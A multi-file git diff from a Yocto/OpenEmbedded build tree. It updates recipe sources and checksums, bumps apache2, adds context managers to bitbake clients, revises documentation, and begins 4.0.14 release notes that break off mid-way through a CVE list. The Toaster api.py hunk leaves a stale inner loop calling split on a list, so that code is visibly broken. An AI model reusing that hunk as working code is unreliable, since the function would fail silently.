"git://github.com/opensvc/multipath-tools.git;protocol=http;branch=master \ +SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=https;branch=master \ file://multipathd.oe \ file://multipath.conf.example \ file://0021-RH-fixup-udev-rules-for-redhat.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb index 12532e4ef1..dc73497257 100644 --- a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb @@ -8,13 +8,13 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=4267f48fc738f50380cbeeb76f95cebc" # These dependencies are required by Foundation DEPENDS = "libpcre2 zlib" -SRC_URI = "git://github.com/pocoproject/poco.git;branch=master;protocol=https \ +SRC_URI = "git://github.com/pocoproject/poco.git;branch=poco-1.12.4;protocol=https \ file://0001-Use-std-atomic-int-instead-of-std-atomic-bool.patch \ file://0001-cppignore.lnx-Ignore-PKCS12-and-testLaunch-test.patch \ file://0001-Fix-data-race-when-create-POSIX-thread.patch \ file://run-ptest \ " -SRCREV = "1211613642269b7d53bea58b02de7fcd25ece3b9" +SRCREV = "3572a1fb981672e2cd1d2533ffd836da7db0f414" UPSTREAM_CHECK_GITTAGREGEX = "poco-(?P<pver>\d+(\.\d+)+)" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb index 21c36687e2..bfb0aaf5e7 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=6542fc4ce5904ffb741ef56f8fe33452" -SRC_URI = "git://github.com/gcovr/gcovr.git;branch=master;protocol=https" +SRC_URI = "git://github.com/gcovr/gcovr.git;branch=main;protocol=https" SRCREV = "1221ef62ff0de15bbeaf79e68e08a65d62c73ff4" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb index ec7747307d..2f94f7a6a5 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb @@ -9,4 +9,6 @@ inherit pypi setuptools3 PYPI_PACKAGE = "ninja_syntax" UPSTREAM_CHECK_URI = "https://pypi.python.org/pypi/ninja_syntax/" -UPSTREAM_CHECK_REGEX = "/ninja_syntax/(?P<pver>(\d+[\.\-_]*)+)"
\ No newline at end of file +UPSTREAM_CHECK_REGEX = "/ninja_syntax/(?P<pver>(\d+[\.\-_]*)+)" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb index dd07968f03..3b9077f326 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb @@ -22,3 +22,4 @@ RDEPENDS:${PN} = " \ python3-ninja-syntax \ " +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb b/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb index b72589368d..fadcc32c24 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb @@ -4,7 +4,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=e664eb75e2791c2e505e6e1c274e6d4f" SRCREV = "218d310e3d840715b1c8e67cefd5b6d71a2d7a1a" -SRC_URI = "git://github.com/NordicSemiconductor/piccata.git;protocol=http;branch=master" +SRC_URI = "git://github.com/NordicSemiconductor/piccata.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch deleted file mode 100644 index 9accbf18a1..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch +++ /dev/null @@ -1,31 +0,0 @@ -From 5c9257fa34335ff83f7c01581cf953111072a457 Mon Sep 17 00:00:00 2001 -From: Valeria Petrov <valeria.petrov@spinetix.com> -Date: Tue, 18 Apr 2023 15:38:53 +0200 -Subject: [PATCH] * modules/mappers/config9.m4: Add 'server' directory to - include path if mod_rewrite is enabled. - -Upstream-Status: Backport [https://svn.apache.org/viewvc?view=revision&revision=1909241] - ---- - modules/mappers/config9.m4 | 5 +++++ - 1 file changed, 5 insertions(+) - -diff --git a/modules/mappers/config9.m4 b/modules/mappers/config9.m4 -index 55a97ab993..7120b729b7 100644 ---- a/modules/mappers/config9.m4 -+++ b/modules/mappers/config9.m4 -@@ -14,6 +14,11 @@ APACHE_MODULE(userdir, mapping of requests to user-specific directories, , , mos - APACHE_MODULE(alias, mapping of requests to different filesystem parts, , , yes) - APACHE_MODULE(rewrite, rule based URL manipulation, , , most) - -+if test "x$enable_rewrite" != "xno"; then -+ # mod_rewrite needs test_char.h -+ APR_ADDTO(INCLUDES, [-I\$(top_builddir)/server]) -+fi -+ - APR_ADDTO(INCLUDES, [-I\$(top_srcdir)/$modpath_current]) - - APACHE_MODPATH_FINISH --- -2.25.1 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb index 00f8aaa415..e4f7e1ceb8 100644 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb +++ b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb @@ -16,7 +16,6 @@ SRC_URI = "${APACHE_MIRROR}/httpd/httpd-${PV}.tar.bz2 \ file://0008-Fix-perl-install-directory-to-usr-bin.patch \ file://0009-support-apxs.in-force-destdir-to-be-empty-string.patch \ file://0001-make_exports.awk-not-expose-the-path.patch \ - file://0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch \ " SRC_URI:append:class-target = " \ @@ -28,7 +27,7 @@ SRC_URI:append:class-target = " \ " LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3" -SRC_URI[sha256sum] = "dbccb84aee95e095edfbb81e5eb926ccd24e6ada55dcd83caecb262e5cf94d2a" +SRC_URI[sha256sum] = "fa16d72a078210a54c47dd5bef2f8b9b8a01d94909a51453956b3ec6442ea4c5" S = "${WORKDIR}/httpd-${PV}" @@ -36,7 +35,7 @@ inherit autotools update-rc.d pkgconfig systemd update-alternatives DEPENDS = "openssl expat pcre apr apr-util apache2-native " -CVE_PRODUCT = "http_server" +CVE_PRODUCT = "apache:http_server" SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice" diff --git a/meta-raspberrypi/docs/extra-build-config.md b/meta-raspberrypi/docs/extra-build-config.md index 5786f3ac87..dc5d33a6f3 100644 --- a/meta-raspberrypi/docs/extra-build-config.md +++ b/meta-raspberrypi/docs/extra-build-config.md @@ -180,7 +180,7 @@ To build an initramfs image: - `INITRAMFS_IMAGE_BUNDLE = "1"` - `BOOT_SPACE = "1073741"` - `INITRAMFS_MAXSIZE = "315400"` - - `IMAGE_FSTYPES_pn-${INITRAMFS_IMAGE} = "${INITRAMFS_FSTYPES}"` + - `IMAGE_FSTYPES:pn-${INITRAMFS_IMAGE} = "${INITRAMFS_FSTYPES}"` ## Including additional files in the SD card image boot partition diff --git a/poky/bitbake/bin/bitbake-hashclient b/poky/bitbake/bin/bitbake-hashclient index 3f265e8fa7..a02a65b937 100755 --- a/poky/bitbake/bin/bitbake-hashclient +++ b/poky/bitbake/bin/bitbake-hashclient @@ -56,25 +56,24 @@ def main(): nonlocal missed_hashes nonlocal max_time - client = hashserv.create_client(args.address) - - for i in range(args.requests): - taskhash = hashlib.sha256() - taskhash.update(args.taskhash_seed.encode('utf-8')) - taskhash.update(str(i).encode('utf-8')) + with hashserv.create_client(args.address) as client: + for i in range(args.requests): + taskhash = hashlib.sha256() + taskhash.update(args.taskhash_seed.encode('utf-8')) + taskhash.update(str(i).encode('utf-8')) - start_time = time.perf_counter() - l = client.get_unihash(METHOD, taskhash.hexdigest()) - elapsed = time.perf_counter() - start_time + start_time = time.perf_counter() + l = client.get_unihash(METHOD, taskhash.hexdigest()) + elapsed = time.perf_counter() - start_time - with lock: - if l: - found_hashes += 1 - else: - missed_hashes += 1 + with lock: + if l: + found_hashes += 1 + else: + missed_hashes += 1 - max_time = max(elapsed, max_time) - pbar.update() + max_time = max(elapsed, max_time) + pbar.update() max_time = 0 found_hashes = 0 @@ -174,9 +173,8 @@ def main(): func = getattr(args, 'func', None) if func: - client = hashserv.create_client(args.address) - - return func(args, client) + with hashserv.create_client(args.address) as client: + return func(args, client) return 0 diff --git a/poky/bitbake/lib/bb/__init__.py b/poky/bitbake/lib/bb/__init__.py index 3163481e56..75b66edc48 100644 --- a/poky/bitbake/lib/bb/__init__.py +++ b/poky/bitbake/lib/bb/__init__.py @@ -15,6 +15,13 @@ import sys if sys.version_info < (3, 8, 0): raise RuntimeError("Sorry, python 3.8.0 or later is required for this version of bitbake") +if sys.version_info < (3, 10, 0): + # With python 3.8 and 3.9, we see errors of "libgcc_s.so.1 must be installed for pthread_cancel to work" + # https://stackoverflow.com/questions/64797838/libgcc-s-so-1-must-be-installed-for-pthread-cancel-to-work + # https://bugs.ams1.psf.io/issue42888 + # so ensure libgcc_s is loaded early on + import ctypes + libgcc_s = ctypes.CDLL('libgcc_s.so.1') class BBHandledException(Exception): """ diff --git a/poky/bitbake/lib/bb/asyncrpc/client.py b/poky/bitbake/lib/bb/asyncrpc/client.py index fa042bbe87..dcbe7e5762 100644 --- a/poky/bitbake/lib/bb/asyncrpc/client.py +++ b/poky/bitbake/lib/bb/asyncrpc/client.py @@ -126,6 +126,12 @@ class AsyncClient(object): {'ping': {}} ) + async def __aenter__(self): + return self + + async def __aexit__(self, exc_type, exc_value, traceback): + await self.close() + class Client(object): def __init__(self): @@ -176,3 +182,10 @@ class Client(object): if sys.version_info >= (3, 6): self.loop.run_until_complete(self.loop.shutdown_asyncgens()) self.loop.close() + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_value, traceback): + self.close() + return False diff --git a/poky/bitbake/lib/bb/command.py b/poky/bitbake/lib/bb/command.py index f2ee587161..79b6c0738f 100644 --- a/poky/bitbake/lib/bb/command.py +++ b/poky/bitbake/lib/bb/command.py @@ -550,8 +550,8 @@ class CommandsSync: and return a datastore object representing the environment for the recipe. """ - fn = params[0] - mc = bb.runqueue.mc_from_tid(fn) + virtualfn = params[0] + (fn, cls, mc) = bb.cache.virtualfn2realfn(virtualfn) appends = params[1] appendlist = params[2] if len(params) > 3: @@ -574,10 +574,10 @@ class CommandsSync: if config_data: # We have to use a different function here if we're passing in a datastore # NOTE: we took a copy above, so we don't do it here again - envdata = command.cooker.databuilder._parse_recipe(config_data, fn, appendfiles, mc, layername)[''] + envdata = command.cooker.databuilder._parse_recipe(config_data, fn, appendfiles, mc, layername)[cls] else: # Use the standard path - envdata = command.cooker.databuilder.parseRecipe(fn, appendfiles, layername) + envdata = command.cooker.databuilder.parseRecipe(virtualfn, appendfiles, layername) idx = command.remotedatastores.store(envdata) return DataStoreConnectionHandle(idx) parseRecipeFile.readonly = True diff --git a/poky/bitbake/lib/prserv/serv.py b/poky/bitbake/lib/prserv/serv.py index c686b2065c..0db6ebc707 100644 --- a/poky/bitbake/lib/prserv/serv.py +++ b/poky/bitbake/lib/prserv/serv.py @@ -344,9 +344,9 @@ def auto_shutdown(): def ping(host, port): from . import client - conn = client.PRClient() - conn.connect_tcp(host, port) - return conn.ping() + with client.PRClient() as conn: + conn.connect_tcp(host, port) + return conn.ping() def connect(host, port): from . import client diff --git a/poky/bitbake/lib/toaster/toastergui/api.py b/poky/bitbake/lib/toaster/toastergui/api.py index b4cdc335ef..a06ffc00dc 100644 --- a/poky/bitbake/lib/toaster/toastergui/api.py +++ b/poky/bitbake/lib/toaster/toastergui/api.py @@ -11,7 +11,7 @@ import os import re import logging import json -import subprocess +import glob from collections import Counter from orm.models import Project, ProjectTarget, Build, Layer_Version @@ -234,13 +234,11 @@ class XhrSetDefaultImageUrl(View): def scan_layer_content(layer,layer_version): # if this is a local layer directory, we can immediately scan its content - if layer.local_source_dir: + if os.path.isdir(layer.local_source_dir): try: # recipes-*/*/*.bb - cmd = '%s %s' % ('ls', os.path.join(layer.local_source_dir,'recipes-*/*/*.bb')) - recipes_list = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read() - recipes_list = recipes_list.decode("utf-8").strip() - if recipes_list and 'No such' not in recipes_list: + recipes_list = glob.glob(os.path.join(layer.local_source_dir, 'recipes-*/*/*.bb')) + for recipe in recipes_list: for recipe in recipes_list.split('\n'): recipe_path = recipe[recipe.rfind('recipes-'):] recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','') @@ -260,6 +258,9 @@ def scan_layer_content(layer,layer_version): except Exception as e: logger.warning("ERROR:scan_layer_content: %s" % e) + else: + logger.warning("ERROR: wrong path given") + raise KeyError("local_source_dir") class XhrLayer(View): """ Delete, Get, Add and Update Layer information diff --git a/poky/documentation/brief-yoctoprojectqs/index.rst b/poky/documentation/brief-yoctoprojectqs/index.rst index df8d75edc2..61c5cbec36 100644 --- a/poky/documentation/brief-yoctoprojectqs/index.rst +++ b/poky/documentation/brief-yoctoprojectqs/index.rst @@ -251,10 +251,10 @@ an entire Linux distribution, including the toolchain, from source. To use such mirrors, uncomment the below lines in your ``conf/local.conf`` file in the :term:`Build Directory`:: - BB_SIGNATURE_HANDLER = "OEEquivHash" - BB_HASHSERVE = "auto" BB_HASHSERVE_UPSTREAM = "hashserv.yocto.io:8687" SSTATE_MIRRORS ?= "file://.* http://cdn.jsdelivr.net/yocto/sstate/all/PATH;downloadfilename=PATH" + BB_HASHSERVE = "auto" + BB_SIGNATURE_HANDLER = "OEEquivHash" #. **Start the Build:** Continue with the following command to build an OS image for the target, which is ``core-image-sato`` in this example: diff --git a/poky/documentation/contributor-guide/recipe-style-guide.rst b/poky/documentation/contributor-guide/recipe-style-guide.rst index a005aa3247..08d8fb4259 100644 --- a/poky/documentation/contributor-guide/recipe-style-guide.rst +++ b/poky/documentation/contributor-guide/recipe-style-guide.rst @@ -250,6 +250,18 @@ Recipes need to define both the :term:`LICENSE` and correct string that you can substitute into the recipe file for a subsequent build. +License Updates +~~~~~~~~~~~~~~~ + +When you change the :term:`LICENSE` or :term:`LIC_FILES_CHKSUM` in the recipe +you need to briefly explain the reason for the change via a ``License-Update:`` +tag. Often it's quite trivial, such as:: + + License-Update: copyright years refreshed + +Less often, the actual licensing terms themselves will have changed. If so, do +try to link to upstream making/justifying that decision. + Tips and Guidelines for Writing Recipes --------------------------------------- diff --git a/poky/documentation/contributor-guide/submit-changes.rst b/poky/documentation/contributor-guide/submit-changes.rst index 53daaf901a..5a6136c8c8 100644 --- a/poky/documentation/contributor-guide/submit-changes.rst +++ b/poky/documentation/contributor-guide/submit-changes.rst @@ -460,7 +460,7 @@ or any layer other than :oe_git:`openembedded-core </openembedded-core/>`, please add the appropriate prefix so that it is clear which layer the patch is intended to be applied to:: - git send-email --subject-prefix="meta-oe][PATCH" ... + git format-patch --subject-prefix="meta-oe][PATCH" ... .. note:: diff --git a/poky/documentation/dev-manual/debugging.rst b/poky/documentation/dev-manual/debugging.rst index fea2cb30a1..bd1e716b0b 100644 --- a/poky/documentation/dev-manual/debugging.rst +++ b/poky/documentation/dev-manual/debugging.rst @@ -327,7 +327,7 @@ BitBake has determined by doing the following: the task. This list also includes indirect dependencies from variables depending on other variables, recursively:: - Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[md5sum]', 'SRC_URI[sha256sum]', 'base_do_fetch'] + Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[sha256sum]', 'base_do_fetch'] .. note:: diff --git a/poky/documentation/dev-manual/layers.rst b/poky/documentation/dev-manual/layers.rst index c65a94b4fa..b3ccf633df 100644 --- a/poky/documentation/dev-manual/layers.rst +++ b/poky/documentation/dev-manual/layers.rst @@ -313,7 +313,7 @@ Logo for your layer and application. The process consists of two parts: successful compatibility registration. #. Completion of an application acceptance form, which you can find at - :yocto_home:`/webform/yocto-project-compatible-registration`. + :yocto_home:`/compatible-registration/`. To be granted permission to use the logo, you need to satisfy the following: @@ -337,7 +337,7 @@ application, you can use the Yocto Project Compatibility Logo with your layer and the application that uses your layer. To access the form, use this link: -:yocto_home:`/webform/yocto-project-compatible-registration`. +:yocto_home:`/compatible-registration`. Follow the instructions on the form to complete your application. The application consists of the following sections: diff --git a/poky/documentation/dev-manual/new-recipe.rst b/poky/documentation/dev-manual/new-recipe.rst index e741cef0e8..2c1033eb35 100644 --- a/poky/documentation/dev-manual/new-recipe.rst +++ b/poky/documentation/dev-manual/new-recipe.rst @@ -303,28 +303,33 @@ If your :term:`SRC_URI` statement includes URLs pointing to individual files fetched from a remote server other than a version control system, BitBake attempts to verify the files against checksums defined in your recipe to ensure they have not been tampered with or otherwise modified -since the recipe was written. Two checksums are used: -``SRC_URI[md5sum]`` and ``SRC_URI[sha256sum]``. +since the recipe was written. Multiple checksums are supported: +``SRC_URI[md5sum]``, ``SRC_URI[sha1sum]``, ``SRC_URI[sha256sum]``. +``SRC_URI[sha384sum]`` and ``SRC_URI[sha512sum]``, but only +``SRC_URI[sha256sum]`` is commonly used. + +.. note:: + + ``SRC_URI[md5sum]`` used to also be commonly used, but it is deprecated + and should be replaced by ``SRC_URI[sha256sum]`` when updating existing + recipes. If your :term:`SRC_URI` variable points to more than a single URL (excluding -SCM URLs), you need to provide the ``md5`` and ``sha256`` checksums for -each URL. For these cases, you provide a name for each URL as part of -the :term:`SRC_URI` and then reference that name in the subsequent checksum -statements. Here is an example combining lines from the files -``git.inc`` and ``git_2.24.1.bb``:: +SCM URLs), you need to provide the ``sha256`` checksum for each URL. For these +cases, you provide a name for each URL as part of the :term:`SRC_URI` and then +reference that name in the subsequent checksum statements. Here is an example +combining lines from the files ``git.inc`` and ``git_2.24.1.bb``:: SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages" - SRC_URI[tarball.md5sum] = "166bde96adbbc11c8843d4f8f4f9811b" SRC_URI[tarball.sha256sum] = "ad5334956301c86841eb1e5b1bb20884a6bad89a10a6762c958220c7cf64da02" - SRC_URI[manpages.md5sum] = "31c2272a8979022497ba3d4202df145d" SRC_URI[manpages.sha256sum] = "9a7ae3a093bea39770eb96ca3e5b40bff7af0b9f6123f089d7821d0e5b8e1230" -Proper values for ``md5`` and ``sha256`` checksums might be available +The proper value for the ``sha256`` checksum might be available together with other signatures on the download page for the upstream source (e.g. ``md5``, ``sha1``, ``sha256``, ``GPG``, and so forth). Because the -OpenEmbedded build system only deals with ``sha256sum`` and ``md5sum``, +OpenEmbedded build system typically only deals with ``sha256sum``, you should verify all the signatures you find by hand. If no :term:`SRC_URI` checksums are specified when you attempt to build the diff --git a/poky/documentation/dev-manual/runtime-testing.rst b/poky/documentation/dev-manual/runtime-testing.rst index 205a96cc59..be1e8c02e5 100644 --- a/poky/documentation/dev-manual/runtime-testing.rst +++ b/poky/documentation/dev-manual/runtime-testing.rst @@ -453,7 +453,7 @@ layer's ``layer.conf`` file as normal). Just remember the following: directory. To create a new test, start by copying an existing module (e.g. -``syslog.py`` or ``gcc.py`` are good ones to use). Test modules can use +``oe_syslog.py`` or ``gcc.py`` are good ones to use). Test modules can use code from ``meta/lib/oeqa/utils``, which are helper classes. .. note:: diff --git a/poky/documentation/migration-guides/migration-2.2.rst b/poky/documentation/migration-guides/migration-2.2.rst index 5435835102..3932792c78 100644 --- a/poky/documentation/migration-guides/migration-2.2.rst +++ b/poky/documentation/migration-guides/migration-2.2.rst @@ -29,7 +29,7 @@ Staging Directories in Sysroot Has Been Simplified The way directories are staged in sysroot has been simplified and introduces the new :term:`SYSROOT_DIRS`, :term:`SYSROOT_DIRS_NATIVE`, and ``SYSROOT_DIRS_BLACKLIST`` -(replaced by :term:`SYSROOT_DIRS_IGNORE` in version 3.5). See the +(replaced by :term:`SYSROOT_DIRS_IGNORE` in version 4.0). See the :oe_lists:`v2 patch series on the OE-Core Mailing List </pipermail/openembedded-core/2016-May/121365.html>` for additional information. diff --git a/poky/documentation/migration-guides/migration-3.0.rst b/poky/documentation/migration-guides/migration-3.0.rst index 8e7a58e74d..67fcac41f7 100644 --- a/poky/documentation/migration-guides/migration-3.0.rst +++ b/poky/documentation/migration-guides/migration-3.0.rst @@ -150,7 +150,7 @@ XML feeds that ``cve-check-tool`` was using, supports CVSSv3 scoring, and makes other improvements. Additionally, the ``CVE_CHECK_CVE_WHITELIST`` variable has been replaced -by ``CVE_CHECK_WHITELIST`` (replaced by :term:`CVE_CHECK_IGNORE` in version 3.5). +by ``CVE_CHECK_WHITELIST`` (replaced by :term:`CVE_CHECK_IGNORE` in version 4.0). .. _migration-3.0-bitbake-changes: diff --git a/poky/documentation/migration-guides/migration-3.4.rst b/poky/documentation/migration-guides/migration-3.4.rst index f50fe5ee04..a9b1057206 100644 --- a/poky/documentation/migration-guides/migration-3.4.rst +++ b/poky/documentation/migration-guides/migration-3.4.rst @@ -255,7 +255,7 @@ Miscellaneous - The previously deprecated ``COMPRESS_CMD`` and ``CVE_CHECK_CVE_WHITELIST`` variables have been removed. Use :term:`CONVERSION_CMD` and ``CVE_CHECK_WHITELIST`` (replaced by - :term:`CVE_CHECK_IGNORE` in version 3.5) respectively + :term:`CVE_CHECK_IGNORE` in version 4.0) respectively instead. - The obsolete ``oe_machinstall`` function previously provided in the diff --git a/poky/documentation/migration-guides/release-4.0.rst b/poky/documentation/migration-guides/release-4.0.rst index adff55df10..09fb8ca049 100644 --- a/poky/documentation/migration-guides/release-4.0.rst +++ b/poky/documentation/migration-guides/release-4.0.rst @@ -20,3 +20,5 @@ Release 4.0 (kirkstone) release-notes-4.0.11 release-notes-4.0.12 release-notes-4.0.13 + release-notes-4.0.14 + release-notes-4.0.15 diff --git a/poky/documentation/migration-guides/release-4.2.rst b/poky/documentation/migration-guides/release-4.2.rst index abeebcb1c8..5ef2cc6657 100644 --- a/poky/documentation/migration-guides/release-4.2.rst +++ b/poky/documentation/migration-guides/release-4.2.rst @@ -10,3 +10,4 @@ Release 4.2 (mickledore) release-notes-4.2.1 release-notes-4.2.2 release-notes-4.2.3 + release-notes-4.2.4 diff --git a/poky/documentation/migration-guides/release-4.3.rst b/poky/documentation/migration-guides/release-4.3.rst index 92516ae8f5..5b651a2efd 100644 --- a/poky/documentation/migration-guides/release-4.3.rst +++ b/poky/documentation/migration-guides/release-4.3.rst @@ -7,3 +7,4 @@ Release 4.3 (nanbield) migration-4.3 release-notes-4.3 + release-notes-4.3.1 diff --git a/poky/documentation/migration-guides/release-notes-4.0.14.rst b/poky/documentation/migration-guides/release-notes-4.0.14.rst new file mode 100644 index 0000000000..02253f33f7 --- /dev/null +++ b/poky/documentation/migration-guides/release-notes-4.0.14.rst @@ -0,0 +1,227 @@ +.. SPDX-License-Identifier: CC-BY-SA-2.0-UK + +Release notes for Yocto-4.0.14 (Kirkstone) +------------------------------------------ + +Security Fixes in Yocto-4.0.14 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- bind: Fix :cve:`2023-3341` and :cve:`2023-4236` +- binutils: Fix :cve:`2022-44840`, :cve:`2022-45703`, :cve:`2022-47008`, :cve:`2022-47011`, :cve:`2022-47673`, :cve:`2022-47695`, :cve:`2022-47696` and :cve:`2022-48063` +- cups: Fix :cve:`2023-4504` +- curl: Fix :cve:`2023-38545` and :cve:`2023-38546` +- gawk: Fix :cve:`2023-4156` +- ghostscript: Fix :cve:`2023-43115` +- glibc: Fix :cve:`2023-4806`, :cve:`2023-4813`, :cve:`2023-4911` and :cve:`2023-5156` +- glibc: Ignore :cve:`2023-4527` +- go: Fix :cve:`2023-24538` and :cve:`2023-39318` +- gstreamer1.0-plugins-bad: fix :cve_mitre:`2023-40474`, :cve_mitre:`2023-40475` and :cve_mitre:`2023-40476` +- libtiff: Fix :cve:`2022-40090` and :cve:`2023-1916` +- libwebp: Fix :cve:`2023-5129` +- libx11: Fix :cve:`2023-43785`, :cve:`2023-43786` and :cve:`2023-43787` +- libxml2: Fix :cve:`2023-45322` +- libxpm: Fix :cve:`2023-43788` and :cve:`2023-43789` +- linux-firmware: Fix :cve:`2022-40982`, :cve:`2023-20569` and :cve:`2023-20593` +- linux-yocto: update CVE exclusions +- linux-yocto/5.10: Ignore :cve:`2003-1604`, :cve:`2004-0230`, :cve:`2006-3635`, :cve:`2006-5331`, :cve:`2006-6128`, :cve:`2007-4774`, :cve:`2007-6761`, :cve:`2007-6762`, :cve:`2008-7316`, :cve:`2009-2692`, :cve:`2010-0008`, :cve:`2010-3432`, :cve:`2010-4648`, :cve:`2010-5313`, :cve:`2010-5328`, :cve:`2010-5329`, :cve:`2010-5331`, :cve:`2010-5332`, :cve:`2011-4098`, :cve:`2011-4131`, :cve:`2011-4915`, :cve:`2011-5321`, :cve:`2011-5327`, :cve:`2012-0957`, :cve:`2012-2119`, :cve:`2012-2136`, :cve:`2012-2137`, :cve:`2012-2313`, :cve:`2012-2319`, :cve:`2012-2372`, :cve:`2012-2375`, :cve:`2012-2390`, :cve:`2012-2669`, :cve:`2012-2744`, :cve:`2012-2745`, :cve:`2012-3364`, :cve:`2012-3375`, :cve:`2012-3400`, :cve:`2012-3412`, :cve:`2012-3430`, :cve:`2012-3510`, :cve:`2012-3511`, :cve:`2012-3520`, :cve:`2012-3552`, :cve:`2012-4398`, :cve:`2012-4444`, :cve:`2012-4461`, :cve:`2012-4467`, :cve:`2012-4508`, :cve:`2012-4530`, :cve:`2012-4565`, :cve:`2012-5374`, :cve:`2012-5375`, :cve:`2012-5517`, :cve:`2012-6536`, :cve:`2012-6537`, :cve:`2012-6538`, :cve:`2012-6539`, :cve:`2012-6540`, :cve:`2012-6541`, :cve:`2012-6542`, :cve:`2012-6543`, :cve:`2012-6544`, :cve:`2012-6545`, :cve:`2012-6546`, :cve:`2012-6547`, :cve:`2012-6548`, :cve:`2012-6549`, :cve:`2012-6638`, :cve:`2012-6647`, :cve:`2012-6657`, :cve:`2012-6689`, :cve:`2012-6701`, :cve:`2012-6703`, :cve:`2012-6704`, :cve:`2012-6712`, :cve:`2013-0160`, :cve:`2013-0190`, :cve:`2013-0216`, :cve:`2013-0217`, :cve:`2013-0228`, :cve:`2013-0231`, :cve:`2013-0268`, :cve:`2013-0290`, :cve:`2013-0309`, :cve:`2013-0310`, :cve:`2013-0311`, :cve:`2013-0313`, :cve:`2013-0343`, :cve:`2013-0349`, :cve:`2013-0871`, :cve:`2013-0913`, :cve:`2013-0914`, :cve:`2013-1059`, :cve:`2013-1763`, :cve:`2013-1767`, :cve:`2013-1772`, :cve:`2013-1773`, :cve:`2013-1774`, :cve:`2013-1792`, :cve:`2013-1796`, :cve:`2013-1797`, :cve:`2013-1798`, :cve:`2013-1819`, :cve:`2013-1826`, :cve:`2013-1827`, :cve:`2013-1828`, :cve:`2013-1848`, :cve:`2013-1858`, :cve:`2013-1860`, :cve:`2013-1928`, :cve:`2013-1929`, :cve:`2013-1943`, :cve:`2013-1956`, :cve:`2013-1957`, :cve:`2013-1958`, :cve:`2013-1959`, :cve:`2013-1979`, :cve:`2013-2015`, :cve:`2013-2017`, :cve:`2013-2058`, :cve:`2013-2094`, :cve:`2013-2128`, :cve:`2013-2140`, :cve:`2013-2141`, :cve:`2013-2146`, :cve:`2013-2147`, :cve:`2013-2148`, :cve:`2013-2164`, :cve:`2013-2206`, :cve:`2013-2232`, :cve:`2013-2234`, :cve:`2013-2237`, :cve:`2013-2546`, :cve:`2013-2547`, :cve:`2013-2548`, :cve:`2013-2596`, :cve:`2013-2634`, :cve:`2013-2635`, :cve:`2013-2636`, :cve:`2013-2850`, :cve:`2013-2851`, :cve:`2013-2852`, :cve:`2013-2888`, :cve:`2013-2889`, :cve:`2013-2890`, :cve:`2013-2891`, :cve:`2013-2892`, :cve:`2013-2893`, :cve:`2013-2894`, :cve:`2013-2895`, :cve:`2013-2896`, :cve:`2013-2897`, :cve:`2013-2898`, :cve:`2013-2899`, :cve:`2013-2929`, :cve:`2013-2930`, :cve:`2013-3076`, :cve:`2013-3222`, :cve:`2013-3223`, :cve:`2013-3224`, :cve:`2013-3225`, :cve:`2013-3226`, :cve:`2013-3227`, :cve:`2013-3228`, :cve:`2013-3229`, :cve:`2013-3230`, :cve:`2013-3231`, :cve:`2013-3232`, :cve:`2013-3233`, :cve:`2013-3234`, :cve:`2013-3235`, :cve:`2013-3236`, :cve:`2013-3237`, :cve:`2013-3301`, :cve:`2013-3302`, 